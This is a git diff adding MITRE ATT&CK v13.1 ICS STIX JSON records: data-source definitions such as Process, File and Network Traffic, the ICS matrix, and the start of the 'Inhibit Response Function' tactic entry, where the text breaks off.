b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--4358c631-e253-4557-86df-f687d0ef9891.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--a8da672f-b2bc-4c43-aa56-fbcc139d6970", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-12-07T19:45:09.019Z", + "name": "Logon Session", + "description": "Logon occurring on a system or resource (local, domain, or cloud) to which a user/device is gaining access after successful authentication and authorization(Citation: Microsoft Audit Logon Events)", + "x_mitre_platforms": [ + "Azure AD", + "Google Workspace", + "IaaS", + "Linux", + "Office 365", + "SaaS", + "Windows", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Host", + "Network" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--4358c631-e253-4557-86df-f687d0ef9891", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0028", + "external_id": "DS0028" + }, + { + "source_name": "Microsoft Audit Logon Events", + "description": "Microsoft. (2021, September 6). Audit logon events. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9.json new file mode 100644 index 0000000000000000000000000000000000000000..379cb06874292580de451d90df2e6a23c7af66b9 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--c4ffd5ce-2749-4629-8aa3-4f2e519b4894", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-12-07T19:35:34.863Z", + "name": "File", + "description": "A computer resource object, managed by the I/O system, for storing data (such as images, text, videos, computer programs, or any wide variety of other media).(Citation: Microsoft File Mgmt)", + "x_mitre_platforms": [ + "Linux", + "Network", + "Windows", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--509ed41e-ca42-461e-9058-24602256daf9", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0022", + "external_id": "DS0022" + }, + { + "source_name": "Microsoft File Mgmt", + "description": "Microsoft. (2018, May 31). File Management (Local File Systems). Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--61bbbf27-f7c3-46ba-a6bc-48ae76928065.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--61bbbf27-f7c3-46ba-a6bc-48ae76928065.json new file mode 100644 index 0000000000000000000000000000000000000000..a5dad376d22086a1ddb642b0c980bc2d5cc3f412 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--61bbbf27-f7c3-46ba-a6bc-48ae76928065.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--def7474c-80e7-4d88-bde9-bbbe393a65ec", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--61bbbf27-f7c3-46ba-a6bc-48ae76928065", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0016", + "external_id": "DS0016" + }, + { + "source_name": "Sysmon EID 9", + "description": "Russinovich, R. & Garnier, T. (2021, August 18). Sysmon Event ID 9. Retrieved September 24, 2021.", + "url": "https://docs.microsoft.com/sysinternals/downloads/sysmon#event-id-9-rawaccessread" + } + ], + "modified": "2022-03-30T14:26:51.804Z", + "name": "Drive", + "description": "A non-volatile data storage device (hard drive, floppy disk, USB flash drive) with at least one formatted partition, typically mounted to the file system and/or assigned a drive letter(Citation: Sysmon EID 9)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--73691708-ffb5-4e29-906d-f485f6fa7089.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--73691708-ffb5-4e29-906d-f485f6fa7089.json new file mode 100644 index 0000000000000000000000000000000000000000..42598d9b1cb9284ff9d75c0d44f09629b1ee80c8 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--73691708-ffb5-4e29-906d-f485f6fa7089.json @@ -0,0 +1,62 @@ +{ + "type": "bundle", + "id": "bundle--f497553d-652a-460e-bd3e-73e50531d6b0", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-20T18:38:00.625Z", + "name": "Command", + "description": "A directive given to a computer program, acting as an interpreter of some kind, in order to perform a specific task(Citation: Confluence Linux Command Line)(Citation: Audit OSX)", + "x_mitre_platforms": [ + "Containers", + "Linux", + "Network", + "Windows", + "macOS", + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)", + "Austin Clark, @c2defense" + ], + "x_mitre_collection_layers": [ + "Container", + "Host" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--73691708-ffb5-4e29-906d-f485f6fa7089", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0017", + "external_id": "DS0017" + }, + { + "source_name": "Confluence Linux Command Line", + "description": "Confluence Support. (2021, September 8). How to enable command line audit logging in linux. Retrieved September 23, 2021.", + "url": "https://confluence.atlassian.com/confkb/how-to-enable-command-line-audit-logging-in-linux-956166545.html" + }, + { + "source_name": "Audit OSX", + "description": "Gagliardi, R. (n.d.). Audit in a OS X System. Retrieved September 23, 2021.", + "url": "https://www.scip.ch/en/?labs.20150108" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--b1717cb4-d536-4e2b-b5e5-07e67e26183c.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--b1717cb4-d536-4e2b-b5e5-07e67e26183c.json new file mode 100644 index 0000000000000000000000000000000000000000..991c501465a1c8a1850864e2e436f4405762034a --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--b1717cb4-d536-4e2b-b5e5-07e67e26183c.json @@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--843d91ca-7c7c-4c38-ba65-a8c30760953e", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-24T19:14:15.637Z", + "name": "Asset", + "description": "Data sources with information about the set of devices found within the network, along with their current software and configurations", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_collection_layers": [ + "Host" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--b1717cb4-d536-4e2b-b5e5-07e67e26183c", + "created": "2022-05-11T16:22:58.802Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0039", + "external_id": "DS0039" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--ba27545a-9c32-47ea-ba6a-cce50f1b326e.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--ba27545a-9c32-47ea-ba6a-cce50f1b326e.json new file mode 100644 index 0000000000000000000000000000000000000000..9543dd4dc7a701966c936e4448a31a7e9f5cb816 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--ba27545a-9c32-47ea-ba6a-cce50f1b326e.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--1051a64e-571b-41cd-9469-ed258ead8d1a", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--ba27545a-9c32-47ea-ba6a-cce50f1b326e", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0033", + "external_id": "DS0033" + }, + { + "source_name": "Microsoft NFS Overview", + "description": "Microsoft. (2018, July 9). Network File System overview. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows-server/storage/nfs/nfs-overview" + } + ], + "modified": "2022-03-30T14:26:51.806Z", + "name": "Network Share", + "description": "A storage resource (typically a folder or drive) made available from one host to others using network protocols, such as Server Message Block (SMB) or Network File System (NFS)(Citation: Microsoft NFS Overview)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3.json new file mode 100644 index 0000000000000000000000000000000000000000..1e0d731d0f1ea0a1757fe8981eb9655553e07928 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3.json @@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--328f0122-e87c-46b8-8346-5f56ca01a1dc", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-20T18:38:13.356Z", + "name": "Network Traffic", + "description": "Data transmitted across a network (ex: Web, DNS, Mail, File, etc.), that is either summarized (ex: Netflow) and/or captured as raw data in an analyzable format (ex: PCAP)", + "x_mitre_platforms": [ + "IaaS", + "Linux", + "Windows", + "macOS", + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)", + "ExtraHop" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Host", + "Network" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--c000cd5c-bbb3-4606-af6f-6c6d9de0bbe3", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0029", + "external_id": "DS0029" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--c9ddfb51-eb45-4e22-b614-44ac1caa7883.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--c9ddfb51-eb45-4e22-b614-44ac1caa7883.json new file mode 100644 index 0000000000000000000000000000000000000000..705c719c584ae0e72cf17af8f9c025f2c019eb3e --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--c9ddfb51-eb45-4e22-b614-44ac1caa7883.json @@ -0,0 +1,50 @@ +{ + "type": "bundle", + "id": "bundle--aea1c361-00c0-4ac9-8f01-2fe5084dc883", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Containers", + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Container", + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--c9ddfb51-eb45-4e22-b614-44ac1caa7883", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0003", + "external_id": "DS0003" + }, + { + "source_name": "Microsoft Tasks", + "description": "Microsoft. (2018, May 31). Tasks. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/taskschd/tasks" + } + ], + "modified": "2022-03-30T14:26:51.806Z", + "name": "Scheduled Job", + "description": "Automated tasks that can be executed at a specific time or on a recurring schedule running in the background (ex: Cron daemon, task scheduler, BITS)(Citation: Microsoft Tasks)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--ca1cb239-ff6d-4f64-b9d7-41c8556a8b4f.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--ca1cb239-ff6d-4f64-b9d7-41c8556a8b4f.json new file mode 100644 index 0000000000000000000000000000000000000000..471cb57dd046e138a10e6fe412ba8dbfeaeb76a3 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--ca1cb239-ff6d-4f64-b9d7-41c8556a8b4f.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--1243dda8-213f-4f76-bf7d-18c978655739", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--ca1cb239-ff6d-4f64-b9d7-41c8556a8b4f", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.265Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0001", + "external_id": "DS0001" + } + ], + "modified": "2022-03-30T14:26:51.805Z", + "name": "Firmware", + "description": "Computer software that provides low-level control for the hardware and device(s) of a host, such as BIOS or UEFI/EFI", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--d710099e-df94-4be4-bf85-cabd30e912bb.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--d710099e-df94-4be4-bf85-cabd30e912bb.json new file mode 100644 index 0000000000000000000000000000000000000000..266f09269b6f5af00265ef7714726c2f461256cb --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--d710099e-df94-4be4-bf85-cabd30e912bb.json @@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--7fd672de-717d-425e-894c-d7482e0324f2", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--d710099e-df94-4be4-bf85-cabd30e912bb", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0019", + "external_id": "DS0019" + }, + { + "source_name": "Microsoft Services", + "description": "Microsoft. (2017, March 30). Introduction to Windows Service Applications. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications" + }, + { + "source_name": "Linux Services Run Levels", + "description": "The Linux Foundation. (2006, January 11). An introduction to services, runlevels, and rc.d scripts. Retrieved September 28, 2021.", + "url": "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + } + ], + "modified": "2022-03-30T14:26:51.807Z", + "name": "Service", + "description": "A computer process that is configured to execute continuously in the background and perform system tasks, in some cases before any user has logged in(Citation: Microsoft Services)(Citation: Linux Services Run Levels)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22.json new file mode 100644 index 0000000000000000000000000000000000000000..233d414fcf3c33e1873b9622f44f15e664318cc8 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22.json @@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--6b85be98-7ef3-4023-8bcc-0a3a305a1d04", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-20T18:38:26.515Z", + "name": "Process", + "description": "Instances of computer programs that are being executed by at least one thread. Processes have memory space for process executables, loaded modules (DLLs or shared libraries), and allocated memory regions containing everything from user input to application-specific data structures(Citation: Microsoft Processes and Threads)", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS", + "Android", + "iOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--e8b8ede7-337b-4c0c-8c32-5c7872c1ee22", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0009", + "external_id": "DS0009" + }, + { + "source_name": "Microsoft Processes and Threads", + "description": "Microsoft. (2018, May 31). Processes and Threads. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--f424e4b4-a8a4-4c58-a4ae-4f53bfd08563.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--f424e4b4-a8a4-4c58-a4ae-4f53bfd08563.json new file mode 100644 index 0000000000000000000000000000000000000000..eed3022879bb151a4644f9bce936321f71da68ba --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-data-source/x-mitre-data-source--f424e4b4-a8a4-4c58-a4ae-4f53bfd08563.json @@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--f02f25b8-af6d-4504-885b-6ce250253d70", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-data-source--f424e4b4-a8a4-4c58-a4ae-4f53bfd08563", + "type": "x-mitre-data-source", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0011", + "external_id": "DS0011" + }, + { + "source_name": "Microsoft LoadLibrary", + "description": "Microsoft. (2018, December 5). LoadLibraryA function (libloaderapi.h). Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya" + }, + { + "source_name": "Microsoft Module Class", + "description": "Microsoft. (n.d.). Module Class. Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module" + } + ], + "modified": "2022-03-30T14:26:51.806Z", + "name": "Module", + "description": "Executable files consisting of one or more shared classes and interfaces, such as portable executable (PE) format binaries/dynamic link libraries (DLL), executable and linkable format (ELF) binaries/shared libraries, and Mach-O format binaries/shared libraries(Citation: Microsoft LoadLibrary)(Citation: Microsoft Module Class)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-matrix/x-mitre-matrix--575f48f4-8897-4468-897b-48bb364af6c7.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-matrix/x-mitre-matrix--575f48f4-8897-4468-897b-48bb364af6c7.json new file mode 100644 index 0000000000000000000000000000000000000000..83fc689222a1c3228d4e5c99697f37ac0f405403 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-matrix/x-mitre-matrix--575f48f4-8897-4468-897b-48bb364af6c7.json @@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--43dd6c40-9639-4d4b-9073-a303920f2939", + "spec_version": "2.0", + "objects": [ + { + "tactic_refs": [ + "x-mitre-tactic--69da72d2-f550-41c5-ab9e-e8255707f28a", + "x-mitre-tactic--93bf9a8e-b14c-4587-b6d5-9efc7c12eb45", + "x-mitre-tactic--78f1d2ae-a579-44c4-8fc5-3e1775c73fac", + "x-mitre-tactic--33752ae7-f875-4f43-bdb6-d8d02d341046", + "x-mitre-tactic--ddf70682-f3ce-479c-a9a4-7eadf9bfead7", + "x-mitre-tactic--696af733-728e-49d7-8261-75fdc590f453", + "x-mitre-tactic--51c25a9e-8615-40c0-8afd-1da578847924", + "x-mitre-tactic--b2a67b1e-913c-46f6-b219-048a90560bb9", + "x-mitre-tactic--97c8ff73-bd14-4b6c-ac32-3d91d2c41e3f", + "x-mitre-tactic--298fe907-7931-4fd2-8131-2814dd493134", + "x-mitre-tactic--ff048b6c-b872-4218-b68c-3735ebd1f024", + "x-mitre-tactic--77542f83-70d0-40c2-8a9d-ad2eb8b00279" + ], + "x_mitre_domains": [ + "ics-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created": "2018-10-17T00:14:20.652Z", + "description": "The full ATT&CK for ICS Matrix includes techniques spanning various ICS assets and can be used to navigate through the knowledge base.", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "ics-attack", + "url": "https://attack.mitre.org/matrices/ics/" + } + ], + "id": "x-mitre-matrix--575f48f4-8897-4468-897b-48bb364af6c7", + "modified": "2022-05-06T17:47:24.396Z", + "name": "ATT&CK for ICS", + "type": "x-mitre-matrix", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--298fe907-7931-4fd2-8131-2814dd493134.json b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--298fe907-7931-4fd2-8131-2814dd493134.json new file mode 100644 index 0000000000000000000000000000000000000000..67ba79adcc6f8b8e5d7f00320b7a50bb0a3c8180 --- /dev/null +++ b/cti-ATT-CK-v13.1/ics-attack/x-mitre-tactic/x-mitre-tactic--298fe907-7931-4fd2-8131-2814dd493134.json @@ -0,0 +1,35 @@ +{ + "type": "bundle", + "id": "bundle--00cb1983-fde3-4f67-b940-728391fd147c", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-08T22:12:52.701Z", + "name": "Inhibit Response Function", + "description": "The adversary is trying to prevent your safety, protection, quality assurance, and operator intervention functions from responding to a failure, hazard, or unsafe state.\n\nInhibit Response Function consists of techniques that adversaries use to hinder the safeguards put in place for processes and products. This may involve the inhibition of safety, protection, quality assurance, or operator intervention functions to disrupt safeguards that aim to prevent the loss of life, destruction of equipment, and disruption of production. These techniques aim to actively deter and prevent expected alarms and responses that arise due to statuses in the ICS environment. Adversaries may modify or update system logic, or even outright prevent responses with a denial-of-service. They may result in the prevention, destruction, manipulation, or modification of programs, logic, devices, and communications. As prevention functions are generally dormant, reporting and processing functions can appear fine, but may have been altered to prevent failure responses in dangerous scenarios. Unlike [Evasion](https://attack.mitre.org/tactics/TA0103), Inhibit Response Function techniques may be more intrusive, such as actively preventing responses to a known dangerous scenario. Adversaries may use these techniques to follow through with or provide cover for [Impact](https://attack.mitre.org/tactics/TA0105) techniques.", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_shortname": "inhibit-response-function", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--298fe907-7931-4fd2-8131-2814dd493134", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0107", + "external_id": "TA0107" + } + ], + "object_marking_refs": [ + 